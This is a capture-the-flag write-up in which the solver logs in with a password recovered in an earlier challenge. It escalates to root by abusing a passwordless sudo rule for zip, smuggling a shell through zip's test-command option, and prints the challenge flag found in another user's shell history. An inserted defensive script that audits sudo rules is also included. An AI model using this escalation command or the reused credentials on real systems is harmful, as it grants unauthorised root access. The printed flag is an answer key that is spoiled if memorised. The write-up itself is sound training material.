Dead Men Tell No Tales

Challenge:

We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.

Username: dracula
Host: deadmen.deadface.io:22

Solution:

The challenge description didn't include a password for dracula, but we remembered that we had recovered it during Behind the Curtain as L3t_m3_in. Once logged into the machine we took a look around but didn't find any immediate files of interest. We then looked for privilege escalation opportunities and observed that dracula had sudo rights to execute zip without a password:

$ sudo -l
...
User dracula may run the following commands
    (ALL) NOPASSWD: /usr/bin/zip
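As an added example (not part of the original writeup), here is a small POSIX shell audit that parses sudo -l output and flags NOPASSWD rules for binaries that GTFOBins documents as able to spawn a shell, so an administrator can catch a misconfiguration like the one above before it is abused. The sample output and the RISKY_BINS watch-list are assumptions constructed for this example.

```shell
# Constructed sample of `sudo -l` output, modelled on the entry above (not captured from the box).
SAMPLE_SUDO_L='Matching Defaults entries for dracula on deadmen:
    env_reset, mail_badpass

User dracula may run the following commands on deadmen:
    (ALL) NOPASSWD: /usr/bin/zip
    (ALL) /usr/bin/apt-get
    (root) NOPASSWD: /usr/bin/systemctl restart nginx'

# Assumed watch-list: binaries GTFOBins documents as able to spawn a shell under sudo.
# zip is the one abused on this page; an administrator would extend this list from GTFOBins.
RISKY_BINS="zip tar vim"

# Read `sudo -l` output from $1 and print each NOPASSWD command whose basename is on the watch-list.
# Exit status is 1 when at least one risky entry exists (so it can gate an alert), 0 otherwise.
find_risky_nopasswd() {
    hits=$(printf '%s\n' "$1" | awk -v risky="$RISKY_BINS" '
        BEGIN { n = split(risky, names, " "); for (i = 1; i <= n; i++) watch[names[i]] = 1 }
        /NOPASSWD:/ {
            sub(/.*NOPASSWD:[[:space:]]*/, "")   # keep only the command spec after NOPASSWD:
            cmd = $1                               # first token is the binary path
            m = split(cmd, parts, "/")             # basename is the last path component
            if (parts[m] in watch) print cmd
        }')
    [ -n "$hits" ] && printf '%s\n' "$hits"
    [ -z "$hits" ]
}

# Example run on the constructed sample: prints /usr/bin/zip and reports the finding.
find_risky_nopasswd "$SAMPLE_SUDO_L" || echo "risky NOPASSWD entries found"
```

A password-protected rule ((ALL) /usr/bin/apt-get) and a NOPASSWD rule for a binary not on the watch-list are both ignored, so only the zip entry is reported.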

We leveraged an escalation technique from GTFOBins to gain root privileges:

$ TF=$(mktemp -u)
$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 34%)
# whoami
root

Finally, we took a "shotgun" approach and ran a filesystem-wide search for the string flag{, which turned up the flag in a user's shell history:

# cd /
# grep -rF "flag{" *

home/spookyboi/.bash_history:echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
